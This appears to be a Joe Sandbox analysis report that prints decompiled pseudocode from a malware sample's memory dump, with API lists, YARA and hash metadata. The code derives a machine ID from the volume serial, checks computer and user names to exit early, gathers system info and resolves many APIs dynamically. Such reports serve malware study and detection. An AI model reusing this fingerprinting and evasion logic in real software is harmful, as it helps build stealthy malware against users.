				 *((short*)(_t145 - 0x1df)) = 0x5c3a;
				 *(_t145 - 0x1dd) = _t110;
				GetVolumeInformationA(_t145 - 0x1e0, _t110, _t110, _t145 - 0x1e4, _t110, _t110, _t110, _t110); // executed
				_t72 =  *(_t145 - 0x1e4) * 0x14a30b - 0x69427551;
				 *(_t145 - 0x144) = _t72;
				_t74 = _t72 * 0x14a30b - 0x69427551;
				 *(_t145 - 0x140) = _t74;
				_t76 = _t74 * 0x14a30b - 0x69427551;
				_t127 = 0;
				do {
					_t76 = _t76 * 0x14a30b - 0x69427551;
					 *(_t145 + _t127 - 0x13c) = _t76;
					_t127 = _t127 + 1;
				} while (_t127 < 8);
				 *(_t145 - 0x1e4) = _t76;
				_t130 = HeapAlloc(GetProcessHeap(), _t110, 0x104);
				if(_t130 != _t110) {
					wsprintfA(_t130, "%08lX%04lX%lu-",  *(_t145 - 0x144),  *(_t145 - 0x140) & 0x0000ffff,  *((intOrPtr*)(_t145 - 0x13a)));
					E0040C297(_t145 - 0x134, _t130);
					_t137 =  *(_t145 - 0x134);
					_t131 = _t137;
					if( *(_t145 - 0x120) >= 0x10) {
						_t84 = _t137;
					} else {
						_t131 = _t145 - 0x134;
						_t84 = _t131;
					}
					_t85 =  &(_t84[ *((intOrPtr*)(_t145 - 0x124))]);
					 *(_t145 - 0x1e8) = _t85;
					if( *(_t145 - 0x120) < 0x10) {
						_t137 = _t145 - 0x134;
					}
					if(_t137 != _t85) {
						_t131 = _t131 - _t137;
						do {
							_t131[_t137] = E0041FCBB( *_t137 & 0x000000ff);
							_t137 =  &(_t137[1]);
							_pop(0x69427551);
						} while (_t137 !=  *(_t145 - 0x1e8));
					}
					_t86 = E00415326(_t131, _t145 - 0x1c0); // executed
					 *((char*)(_t145 - 4)) = 1;
					_t132 = E0040C034(0x69427551, _t145 - 0x1dc, _t86, 0x14, 0x11);
					 *((char*)(_t145 - 4)) = 2;
					_t88 = E0041537D(_t87, _t145 - 0x1a4);
					 *((char*)(_t145 - 4)) = 3;
					_t89 = E0040C034(0x69427551, _t145 - 0x188, _t88, _t110, 0x18);
					_t111 = _t145 - 0x134;
					 *((char*)(_t145 - 4)) = 4;
					E00415BAD(_t89, _t145 - 0x134, _t89, _t132, _t145 - 0x16c);
					 *((char*)(_t145 - 4)) = 5;
					_t92 = E004046CE(_t132, _t145 - 0x150);
					 *((char*)(_t145 - 4)) = 6;
					E004042ED(_t111, _t92);
					_t110 = 0;
					E00404354(_t145 - 0x150, 1, 0);
					E00404354(_t145 - 0x16c, 1, 0);
					E00404354(_t145 - 0x188, 1, 0);
					E00404354(_t145 - 0x1a4, 1, 0);
					E00404354(_t145 - 0x1dc, 1, 0);
					 *((char*)(_t145 - 4)) = 0;
					E00404354(_t145 - 0x1c0, 1, 0);
					_t130 =  *(_t145 - 0x1ec);
					_t130[0x14] = 0xf;
					_t130[0x10] = 0;
					_t136 = _t145 - 0x134;
					 *_t130 = 0;
					E004042ED(_t130, _t145 - 0x134);
					E00404354(_t136, 1, 0);
				} else {
					_t136[5] = 0xf;
					_t136[4] = _t110;
					 *_t136 = _t110;
					E00404331(_t136, _t110);
					E00404354(_t145 - 0x134, 1, _t110);
				}
				return E00420888(_t110, _t130, _t136);
			}

















                                                                    0x00414c66
                                                                    0x00414c70
                                                                    0x00414c75
                                                                    0x00414c77
                                                                    0x00414c7d
                                                                    0x00414c7f
                                                                    0x00414c85
                                                                    0x00414c8b
                                                                    0x00414c95
                                                                    0x00414c9b
                                                                    0x00414cae
                                                                    0x00414cb9
                                                                    0x00414cbb
                                                                    0x00414cbb
                                                                    0x00414ccc
                                                                    0x00414ce2
                                                                    0x00414ceb
                                                                    0x00414cf1
                                                                    0x00414d08
                                                                    0x00414d0a
                                                                    0x00414d16
                                                                    0x00414d18
                                                                    0x00414d25
                                                                    0x00414d27
                                                                    0x00414d29
                                                                    0x00414d2f
                                                                    0x00414d31
                                                                    0x00414d38
                                                                    0x00414d39
                                                                    0x00414d40
                                                                    0x00414d53
                                                                    0x00414d57
                                                                    0x00414d9c
                                                                    0x00414dad
                                                                    0x00414db9
                                                                    0x00414dbf
                                                                    0x00414dc1
                                                                    0x00414f07
                                                                    0x00414dc7
                                                                    0x00414dc7
                                                                    0x00414dcd
                                                                    0x00414dcd
                                                                    0x00414dcf
                                                                    0x00414ddc
                                                                    0x00414de2
                                                                    0x00414de4
                                                                    0x00414de4
                                                                    0x00414dec
                                                                    0x00414dee
                                                                    0x00414df0
                                                                    0x00414df9
                                                                    0x00414dfc
                                                                    0x00414dfd
                                                                    0x00414dfe
                                                                    0x00414df0
                                                                    0x00414e0c
                                                                    0x00414e1c
                                                                    0x00414e25
                                                                    0x00414e2d
                                                                    0x00414e31
                                                                    0x00414e40
                                                                    0x00414e44
                                                                    0x00414e52
                                                                    0x00414e58
                                                                    0x00414e5c
                                                                    0x00414e6c
                                                                    0x00414e70
                                                                    0x00414e79
                                                                    0x00414e7d
                                                                    0x00414e82
                                                                    0x00414e8f
                                                                    0x00414e9c
                                                                    0x00414ea9
                                                                    0x00414eb6
                                                                    0x00414ec3
                                                                    0x00414ed0
                                                                    0x00414ed3
                                                                    0x00414ed8
                                                                    0x00414ede
                                                                    0x00414ee5
                                                                    0x00414ee8
                                                                    0x00414eee
                                                                    0x00414ef0
                                                                    0x00414efa
                                                                    0x00414d59
                                                                    0x00414d59
                                                                    0x00414d60
                                                                    0x00414d66
                                                                    0x00414d68
                                                                    0x00414d76
                                                                    0x00414d7b
                                                                    0x00414f06

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00414C70
                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00414CB1
                                                                    • GetVolumeInformationA.KERNELBASE ref: 00414CF1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414D46
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00414D4D
                                                                    • wsprintfA.USER32 ref: 00414D9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocDirectoryH_prolog3_InformationProcessVolumeWindowswsprintf
                                                                    • String ID: %08lX%04lX%lu-$:\$C$QuBi
                                                                    • API String ID: 3500232521-1320645344
                                                                    • Opcode ID: 8859b93e367feb201de391189b91548d1d21cf734e1c7d35d70a12964ce6d76e
                                                                    • Instruction ID: 7800caf5788651b07f2932c072cb6ae7bb44dd8327f48545f3071958f15c93b2
                                                                    • Opcode Fuzzy Hash: 8859b93e367feb201de391189b91548d1d21cf734e1c7d35d70a12964ce6d76e
                                                                    • Instruction Fuzzy Hash: B471C5B19011689FDB21EB65CD80BDDBBB8AF99304F0400EEE949B3241D6745F85CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040BE20 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E0040BE20(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				signed int _t8;
				intOrPtr _t10;
				intOrPtr _t17;
				intOrPtr _t20;
				signed int _t25;
				void* _t27;

				_t24 = __esi;
				_t23 = __edi;
				_t16 = __ebx;
				_t25 = _t27 - 0x8c;
				_t8 =  *0x443674; // 0x393162b1
				 *(_t25 + 0x88) = _t8 ^ _t25;
				_t10 = E0041522A(__ebx, __edx, __edi, __esi);
				_t17 =  *0x44606c; // 0x4c92f20
				_t22 = _t10;
				if(E00415EA0(_t17, _t10) == 0) {
					 *(_t25 - 0x80) = 0x101;
					GetUserNameA(_t25 - 0x7c, _t25 - 0x80);
					_t20 =  *0x4461ac; // 0x4c92f30
					_t22 = _t25 - 0x7c;
					_t11 = E00415EA0(_t20, _t25 - 0x7c);
					if(_t11 == 0) {
						ExitProcess(_t11);
					}
				}
				return E0041DA9B(_t11, _t16,  *(_t25 + 0x88) ^ _t25, _t22, _t23, _t24);
			}









                                                                    0x0040be20
                                                                    0x0040be20
                                                                    0x0040be20
                                                                    0x0040be21
                                                                    0x0040be2e
                                                                    0x0040be35
                                                                    0x0040be3b
                                                                    0x0040be40
                                                                    0x0040be46
                                                                    0x0040be4f
                                                                    0x0040be59
                                                                    0x0040be60
                                                                    0x0040be66
                                                                    0x0040be6c
                                                                    0x0040be6f
                                                                    0x0040be76
                                                                    0x0040be79
                                                                    0x0040be79
                                                                    0x0040be76
                                                                    0x0040be93

                                                                    APIs
                                                                      • Part of subcall function 0041522A: GetComputerNameA.KERNEL32 ref: 00415259
                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 0040BE60
                                                                    • ExitProcess.KERNEL32 ref: 0040BE79
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Name$ComputerExitProcessUser
                                                                    • String ID:
                                                                    • API String ID: 162832415-0
                                                                    • Opcode ID: be9637f4022ce577b140ca62154b0ad0eb56bcbc75323027480c01ab5958bc33
                                                                    • Instruction ID: d3f0cd800ad9897325274bc7e6462560b5c94c1e503cd198cb921ca5e59d3afa
                                                                    • Opcode Fuzzy Hash: be9637f4022ce577b140ca62154b0ad0eb56bcbc75323027480c01ab5958bc33
                                                                    • Instruction Fuzzy Hash: 04F06274900208CBDB20EFB0EC44ADE77B9BB5A308F40842EDC09D7241FF7895488B99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414F0E Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E00414F0E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t13;
				void* _t22;
				void* _t23;
				void* _t25;
				void* _t26;

				_t26 = __eflags;
				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t18 = __ebx;
				_push(0x4c);
				E0042083E(E0043475A, __ebx, __edi, __esi);
				 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
				GetSystemInfo(_t25 - 0x54); // executed
				_t13 = E00415F45(__ebx, _t25 - 0x2c, _t22, __edi, __esi, _t26,  *((intOrPtr*)(_t25 - 0x40))); // executed
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				if( *((intOrPtr*)(_t13 + 0x14)) >= 0x10) {
					_t13 =  *_t13;
				}
				E004042A9(_t23, _t13);
				E00404354(_t25 - 0x2c, 1, 0);
				return E00420888(_t18, _t23, _t24);
			}








                                                                    0x00414f0e
                                                                    0x00414f0e
                                                                    0x00414f0e
                                                                    0x00414f0e
                                                                    0x00414f0e
                                                                    0x00414f0e
                                                                    0x00414f15
                                                                    0x00414f1a
                                                                    0x00414f22
                                                                    0x00414f2e
                                                                    0x00414f33
                                                                    0x00414f3b
                                                                    0x00414f3d
                                                                    0x00414f3d
                                                                    0x00414f42
                                                                    0x00414f4e
                                                                    0x00414f5a

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00414F15
                                                                    • GetSystemInfo.KERNELBASE(?,0000004C,0040B8F9,00000001,00000000), ref: 00414F22
                                                                      • Part of subcall function 00415F45: __EH_prolog3_GS.LIBCMT ref: 00415F4F
                                                                      • Part of subcall function 00415F45: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416052
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_$InfoIos_base_dtorSystemstd::ios_base::_
                                                                    • String ID:
                                                                    • API String ID: 881831149-0
                                                                    • Opcode ID: aa459c087e0cc634c01cf06471d7fe6fbe510b168132e119c4a5861d44a15a1f
                                                                    • Instruction ID: 00775680f408d1f54713e91b73b6090a145a6d657ab252316799370099833476
                                                                    • Opcode Fuzzy Hash: aa459c087e0cc634c01cf06471d7fe6fbe510b168132e119c4a5861d44a15a1f
                                                                    • Instruction Fuzzy Hash: 87F03971A10108DBEF44FBA5D946BEC7375EB89305F80406AF211AA1D2CB7C5949CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418B05 Relevance: 227.1, APIs: 151, Instructions: 633libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E00418B05() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				_Unknown_base(*)()* _t32;

				_t1 =  *0x446474; // 0x76ff0000
				if(_t1 != 0) {
					 *0x446460 = GetProcAddress(_t1,  *0x445a70);
					 *0x4464e0 = GetProcAddress( *0x446474,  *0x445a78);
					 *0x446448 = GetProcAddress( *0x446474,  *0x445af0);
					 *0x44631c = GetProcAddress( *0x446474,  *0x445ff4);
					 *0x446314 = GetProcAddress( *0x446474,  *0x446060);
					 *0x4463c0 = GetProcAddress( *0x446474,  *0x445e00);
					 *0x4464d0 = GetProcAddress( *0x446474,  *0x445ae0);
					 *0x44640c = GetProcAddress( *0x446474,  *0x445d0c);
					 *0x446484 = GetProcAddress( *0x446474,  *0x4460e8);
					 *0x4462bc = GetProcAddress( *0x446474,  *0x446070);
					 *0x446498 = GetProcAddress( *0x446474,  *0x446048);
					 *0x4463e4 = GetProcAddress( *0x446474,  *0x4461b4);
					 *0x4462c0 = GetProcAddress( *0x446474,  *0x445c6c);
					 *0x4463bc = GetProcAddress( *0x446474,  *0x445f10);
					 *0x446320 = GetProcAddress( *0x446474,  *0x445eac);
					 *0x446300 = GetProcAddress( *0x446474,  *0x445f38);
					 *0x4464d4 = GetProcAddress( *0x446474,  *0x445a6c);
					 *0x44629c = GetProcAddress( *0x446474,  *0x4460a4);
					 *0x4464e8 = GetProcAddress( *0x446474,  *0x445f24);
					 *0x446340 = GetProcAddress( *0x446474,  *0x445fc4);
					 *0x4462b0 = GetProcAddress( *0x446474,  *0x445c68);
					 *0x4463f0 = GetProcAddress( *0x446474,  *0x445eb4);
					 *0x4463a0 = GetProcAddress( *0x446474,  *0x445da0);
					 *0x4462d4 = GetProcAddress( *0x446474,  *0x445b14);
					 *0x446268 = GetProcAddress( *0x446474,  *0x445bbc);
					 *0x4464e4 = GetProcAddress( *0x446474,  *0x445d54);
					 *0x4462f4 = GetProcAddress( *0x446474,  *0x445e58);
					 *0x44639c = GetProcAddress( *0x446474,  *0x445bdc);
					 *0x446418 = GetProcAddress( *0x446474,  *0x445e90);
					 *0x446274 = GetProcAddress( *0x446474,  *0x445f60);
					 *0x4464b8 = GetProcAddress( *0x446474,  *0x446194);
					 *0x4464d8 = GetProcAddress( *0x446474,  *0x445fa4);
					 *0x4462d0 = GetProcAddress( *0x446474,  *0x445d90);
					 *0x44632c = GetProcAddress( *0x446474,  *0x445a74);
					 *0x4462a0 = GetProcAddress( *0x446474,  *0x445df8);
					 *0x4462d8 = GetProcAddress( *0x446474,  *0x445f00);
					 *0x4464b0 = GetProcAddress( *0x446474,  *0x445b6c);
					 *0x4463cc = GetProcAddress( *0x446474,  *0x445cbc);
					 *0x4463b0 = GetProcAddress( *0x446474,  *0x445c1c);
					 *0x446464 = GetProcAddress( *0x446474,  *0x44605c);
					 *0x446328 = GetProcAddress( *0x446474,  *0x445fcc);
					 *0x446378 = GetProcAddress( *0x446474,  *0x445b98);
					 *0x44626c = GetProcAddress( *0x446474,  *0x445adc);
					 *0x446438 = GetProcAddress( *0x446474,  *0x445a5c);
					 *0x446424 = GetProcAddress( *0x446474,  *0x445e20);
					 *0x4463e0 = GetProcAddress( *0x446474,  *0x445e18);
					 *0x4464bc = GetProcAddress( *0x446474,  *0x445a60);
					 *0x4462ac = GetProcAddress( *0x446474,  *0x445b34);
					 *0x4463b8 = GetProcAddress( *0x446474,  *0x445b88);
					 *0x4462f8 = GetProcAddress( *0x446474,  *0x4460c8);
					 *0x4462b4 = GetProcAddress( *0x446474,  *0x446024);
					 *0x446494 = GetProcAddress( *0x446474,  *0x446120);
					 *0x446288 = GetProcAddress( *0x446474,  *0x4461d0);
					 *0x446410 = GetProcAddress( *0x446474,  *0x445c84);
					 *0x44646c = GetProcAddress( *0x446474,  *0x445de8);
					 *0x4462dc = GetProcAddress( *0x446474,  *0x445b38);
					 *0x4463b4 = GetProcAddress( *0x446474,  *0x445ba4);
					 *0x44630c = GetProcAddress( *0x446474,  *0x446050);
					 *0x44625c = GetProcAddress( *0x446474,  *0x445dd4);
				}
				_t2 = LoadLibraryA( *0x445d14); // executed
				 *0x44643c = _t2; // executed
				_t3 = LoadLibraryA( *0x445bc8); // executed
				 *0x446348 = _t3; // executed
				_t4 = LoadLibraryA( *0x445ce0); // executed
				 *0x4462e8 = _t4; // executed
				_t5 = LoadLibraryA( *0x445b18); // executed
				 *0x446390 = _t5; // executed
				_t6 = LoadLibraryA( *0x4460d0); // executed
				 *0x446384 = _t6;
				 *0x4464ac = LoadLibraryA( *0x445aac); // executed
				_t8 = LoadLibraryA( *0x445c30); // executed
				 *0x44635c = _t8; // executed
				_t9 = LoadLibraryA( *0x445c18); // executed
				 *0x4464a0 = _t9;
				 *0x446374 = LoadLibraryA( *0x445fd0); // executed
				_t11 = LoadLibraryA( *0x445ecc); // executed
				 *0x446490 = _t11; // executed
				_t12 = LoadLibraryA( *0x445d7c); // executed
				 *0x44634c = _t12;
				_t13 =  *0x44643c; // 0x73bd0000
				if(_t13 != 0) {
					 *0x44636c = GetProcAddress(_t13,  *0x445afc);
					 *0x446420 = GetProcAddress( *0x44643c,  *0x44611c);
					 *0x446318 = GetProcAddress( *0x44643c,  *0x445f18);
					 *0x4462f0 = GetProcAddress( *0x44643c,  *0x445d4c);
					 *0x4462cc = GetProcAddress( *0x44643c,  *0x445f30);
					 *0x446470 = GetProcAddress( *0x44643c,  *0x445ab8);
				}
				_t14 =  *0x446348; // 0x76620000
				if(_t14 != 0) {
					 *0x446330 = GetProcAddress(_t14,  *0x445d3c);
					 *0x446264 = GetProcAddress( *0x446348,  *0x445b28);
					 *0x4463e8 = GetProcAddress( *0x446348,  *0x445ac4);
				}
				_t15 =  *0x446260; // 0x76ef0000
				if(_t15 != 0) {
					 *0x446350 = GetProcAddress(_t15,  *0x4460b8);
					 *0x446334 = GetProcAddress( *0x446260,  *0x445f48);
					 *0x4463d8 = GetProcAddress( *0x446260,  *0x445b8c);
					 *0x4464b4 = GetProcAddress( *0x446260,  *0x446154);
					 *0x446270 = GetProcAddress( *0x446260,  *0x445d30);
					 *0x44647c = GetProcAddress( *0x446260,  *0x445c20);
					 *0x446310 = GetProcAddress( *0x446260,  *0x445fdc);
					 *0x446354 = GetProcAddress( *0x446260,  *0x445fb0);
					 *0x446278 = GetProcAddress( *0x446260,  *0x446128);
					 *0x4464c8 = GetProcAddress( *0x446260,  *0x4461cc);
					 *0x446478 = GetProcAddress( *0x446260,  *0x445f50);
					 *0x446338 = GetProcAddress( *0x446260,  *0x446018);
					 *0x4463a4 = GetProcAddress( *0x446260,  *0x445d9c);
					 *0x446450 = GetProcAddress( *0x446260,  *0x445c00);
					 *0x4462c8 = GetProcAddress( *0x446260,  *0x4460f0);
				}
				_t16 =  *0x4462e8; // 0x6f8c0000
				if(_t16 != 0) {
					 *0x446360 = GetProcAddress(_t16,  *0x445c54);
					 *0x446388 = GetProcAddress( *0x4462e8,  *0x445f7c);
					 *0x446444 = GetProcAddress( *0x4462e8,  *0x445f68);
					 *0x4464c4 = GetProcAddress( *0x4462e8,  *0x445f3c);
					 *0x446480 = GetProcAddress( *0x4462e8,  *0x445c64);
					 *0x446364 = GetProcAddress( *0x4462e8,  *0x445e88);
					 *0x446294 = GetProcAddress( *0x4462e8,  *0x446108);
					 *0x4464dc = GetProcAddress( *0x4462e8,  *0x445dc8);
					 *0x4463a8 = GetProcAddress( *0x4462e8,  *0x446188);
					 *0x446368 = GetProcAddress( *0x4462e8,  *0x445c7c);
					 *0x446258 = GetProcAddress( *0x4462e8,  *0x445e60);
					 *0x446344 = GetProcAddress( *0x4462e8,  *0x44616c);
					 *0x446304 = GetProcAddress( *0x4462e8,  *0x446104);
				}
				_t17 =  *0x446390; // 0x75220000
				if(_t17 != 0) {
					 *0x4462c4 = GetProcAddress(_t17,  *0x445c78);
					 *0x4462a4 = GetProcAddress( *0x446390,  *0x44602c);
					 *0x446284 = GetProcAddress( *0x446390,  *0x445cb8);
					 *0x446440 = GetProcAddress( *0x446390,  *0x445ff8);
					 *0x4463dc = GetProcAddress( *0x446390,  *0x445ebc);
					 *0x446370 = GetProcAddress( *0x446390,  *0x445bb0);
					 *0x446358 = GetProcAddress( *0x446390,  *0x44619c);
				}
				_t18 =  *0x446384; // 0x76990000
				if(_t18 != 0) {
					 *0x4462e0 = GetProcAddress(_t18,  *0x445ec4);
					 *0x446430 = GetProcAddress( *0x446384,  *0x445d08);
					 *0x44644c = GetProcAddress( *0x446384,  *0x446168);
					 *0x446394 = GetProcAddress( *0x446384,  *0x445b74);
					 *0x446290 = GetProcAddress( *0x446384,  *0x445dd0);
				}
				_t19 =  *0x4464ac; // 0x76d60000
				if(_t19 != 0) {
					 *0x446280 = GetProcAddress(_t19,  *0x44601c);
					 *0x44642c = GetProcAddress( *0x4464ac,  *0x445dec);
					 *0x4463f8 = GetProcAddress( *0x4464ac,  *0x44600c);
					 *0x44628c = GetProcAddress( *0x4464ac,  *0x446054);
					 *0x4464a8 = GetProcAddress( *0x4464ac,  *0x44604c);
					 *0x44627c = GetProcAddress( *0x4464ac,  *0x445d04);
					 *0x446404 = GetProcAddress( *0x4464ac,  *0x445f2c);
					 *0x4464c0 = GetProcAddress( *0x4464ac,  *0x445c90);
					 *0x4464cc = GetProcAddress( *0x4464ac,  *0x445d6c);
					 *0x446468 = GetProcAddress( *0x4464ac,  *0x445eec);
					 *0x44649c = GetProcAddress( *0x4464ac,  *0x445d78);
				}
				_t20 =  *0x44635c; // 0x76980000
				if(_t20 != 0) {
					 *0x446454 = GetProcAddress(_t20,  *0x445d98);
					 *0x4462b8 = GetProcAddress( *0x44635c,  *0x445f78);
					 *0x4463ac = GetProcAddress( *0x44635c,  *0x446038);
				}
				_t21 =  *0x4464a0; // 0x73d80000
				if(_t21 != 0) {
					 *0x44648c = GetProcAddress(_t21,  *0x445d60);
					 *0x446380 = GetProcAddress( *0x4464a0,  *0x445ab0);
					 *0x446408 = GetProcAddress( *0x4464a0,  *0x445c70);
				}
				_t22 =  *0x446374; // 0x752a0000
				if(_t22 != 0) {
					 *0x4464ec = GetProcAddress(_t22,  *0x445d40);
					 *0x446324 = GetProcAddress( *0x446374,  *0x445ae8);
					 *0x446458 = GetProcAddress( *0x446374,  *0x445b84);
					 *0x4463ec = GetProcAddress( *0x446374,  *0x445c58);
					 *0x4462a8 = GetProcAddress( *0x446374,  *0x446098);
					 *0x4462e4 = GetProcAddress( *0x446374,  *0x445fa0);
				}
				_t23 =  *0x446490; // 0x6aca0000
				if(_t23 != 0) {
					 *0x446398 = GetProcAddress(_t23,  *0x445e48);
				}
				_t24 =  *0x44634c; // 0x72860000
				if(_t24 != 0) {
					 *0x4462ec = GetProcAddress(_t24,  *0x445dbc);
					 *0x44633c = GetProcAddress( *0x44634c,  *0x445c94);
					 *0x4463f4 = GetProcAddress( *0x44634c,  *0x445cf4);
					 *0x446434 = GetProcAddress( *0x44634c,  *0x445b4c);
					 *0x446414 = GetProcAddress( *0x44634c,  *0x445ef4);
					 *0x4463c8 = GetProcAddress( *0x44634c,  *0x4461bc);
					 *0x446308 = GetProcAddress( *0x44634c,  *0x445d68);
					_t32 = GetProcAddress( *0x44634c,  *0x4461b0);
					 *0x446488 = _t32;
					return _t32;
				}
				return _t24;
			}


























                                                                    0x00418b05
                                                                    0x00418b0c
                                                                    0x00418b25
                                                                    0x00418b3c
                                                                    0x00418b53
                                                                    0x00418b6a
                                                                    0x00418b81
                                                                    0x00418b98
                                                                    0x00418baf
                                                                    0x00418bc6
                                                                    0x00418bdd
                                                                    0x00418bf4
                                                                    0x00418c0b
                                                                    0x00418c22
                                                                    0x00418c39
                                                                    0x00418c50
                                                                    0x00418c67
                                                                    0x00418c7e
                                                                    0x00418c95
                                                                    0x00418cac
                                                                    0x00418cc3
                                                                    0x00418cda
                                                                    0x00418cf1
                                                                    0x00418d08
                                                                    0x00418d1f
                                                                    0x00418d36
                                                                    0x00418d4d
                                                                    0x00418d64
                                                                    0x00418d7b
                                                                    0x00418d92
                                                                    0x00418da9
                                                                    0x00418dc0
                                                                    0x00418dd7
                                                                    0x00418dee
                                                                    0x00418e05
                                                                    0x00418e1c
                                                                    0x00418e33
                                                                    0x00418e4a
                                                                    0x00418e61
                                                                    0x00418e78
                                                                    0x00418e8f
                                                                    0x00418ea6
                                                                    0x00418ebd
                                                                    0x00418ed4
                                                                    0x00418eeb
                                                                    0x00418f02
                                                                    0x00418f19
                                                                    0x00418f30
                                                                    0x00418f47
                                                                    0x00418f5e
                                                                    0x00418f75
                                                                    0x00418f8c
                                                                    0x00418fa3
                                                                    0x00418fba
                                                                    0x00418fd1
                                                                    0x00418fe8
                                                                    0x00418fff
                                                                    0x00419016
                                                                    0x0041902d
                                                                    0x00419044
                                                                    0x00419055
                                                                    0x00419055
                                                                    0x00419060
                                                                    0x0041906c
                                                                    0x00419071
                                                                    0x0041907d
                                                                    0x00419082
                                                                    0x0041908e
                                                                    0x00419093
                                                                    0x0041909f
                                                                    0x004190a4
                                                                    0x004190b0
                                                                    0x004190c1
                                                                    0x004190c6
                                                                    0x004190d2
                                                                    0x004190d7
                                                                    0x004190e3
                                                                    0x004190f4
                                                                    0x004190f9
                                                                    0x00419105
                                                                    0x0041910a
                                                                    0x00419110
                                                                    0x00419115
                                                                    0x0041911c
                                                                    0x00419135
                                                                    0x0041914c
                                                                    0x00419163
                                                                    0x0041917a
                                                                    0x00419191
                                                                    0x004191a2
                                                                    0x004191a2
                                                                    0x004191a7
                                                                    0x004191ae
                                                                    0x004191c3
                                                                    0x004191da
                                                                    0x004191eb
                                                                    0x004191eb
                                                                    0x004191f0
                                                                    0x004191f7
                                                                    0x00419210
                                                                    0x00419227
                                                                    0x0041923e
                                                                    0x00419255
                                                                    0x0041926c
                                                                    0x00419283
                                                                    0x0041929a
                                                                    0x004192b1
                                                                    0x004192c8
                                                                    0x004192df
                                                                    0x004192f6
                                                                    0x0041930d
                                                                    0x00419324
                                                                    0x0041933b
                                                                    0x0041934c
                                                                    0x0041934c
                                                                    0x00419351
                                                                    0x00419358
                                                                    0x00419371
                                                                    0x00419388
                                                                    0x0041939f
                                                                    0x004193b6
                                                                    0x004193cd
                                                                    0x004193e4
                                                                    0x004193fb
                                                                    0x00419412
                                                                    0x00419429
                                                                    0x00419440
                                                                    0x00419457
                                                                    0x0041946e
                                                                    0x0041947f
                                                                    0x0041947f
                                                                    0x00419484
                                                                    0x0041948b
                                                                    0x004194a4
                                                                    0x004194bb
                                                                    0x004194d2
                                                                    0x004194e9
                                                                    0x00419500
                                                                    0x00419517
                                                                    0x00419528
                                                                    0x00419528
                                                                    0x0041952d
                                                                    0x00419534
                                                                    0x00419549
                                                                    0x00419560
                                                                    0x00419577
                                                                    0x0041958e
                                                                    0x0041959f
                                                                    0x0041959f
                                                                    0x004195a4
                                                                    0x004195ab
                                                                    0x004195c4
                                                                    0x004195db
                                                                    0x004195f2
                                                                    0x00419609
                                                                    0x00419620
                                                                    0x00419637
                                                                    0x0041964e
                                                                    0x00419665
                                                                    0x0041967c
                                                                    0x00419693
                                                                    0x004196a4
                                                                    0x004196a4
                                                                    0x004196a9
                                                                    0x004196b0
                                                                    0x004196c5
                                                                    0x004196dc
                                                                    0x004196ed
                                                                    0x004196ed
                                                                    0x004196f2
                                                                    0x004196f9
                                                                    0x0041970e
                                                                    0x00419725
                                                                    0x00419736
                                                                    0x00419736
                                                                    0x0041973b
                                                                    0x00419742
                                                                    0x0041975b
                                                                    0x00419772
                                                                    0x00419789
                                                                    0x004197a0
                                                                    0x004197b7
                                                                    0x004197c8
                                                                    0x004197c8
                                                                    0x004197cd
                                                                    0x004197d4
                                                                    0x004197e3
                                                                    0x004197e3
                                                                    0x004197e8
                                                                    0x004197ef
                                                                    0x00419808
                                                                    0x0041981f
                                                                    0x00419836
                                                                    0x0041984d
                                                                    0x00419864
                                                                    0x0041987b
                                                                    0x00419892
                                                                    0x0041989d
                                                                    0x004198a3
                                                                    0x00000000
                                                                    0x004198a3
                                                                    0x004198a8

                                                                    APIs
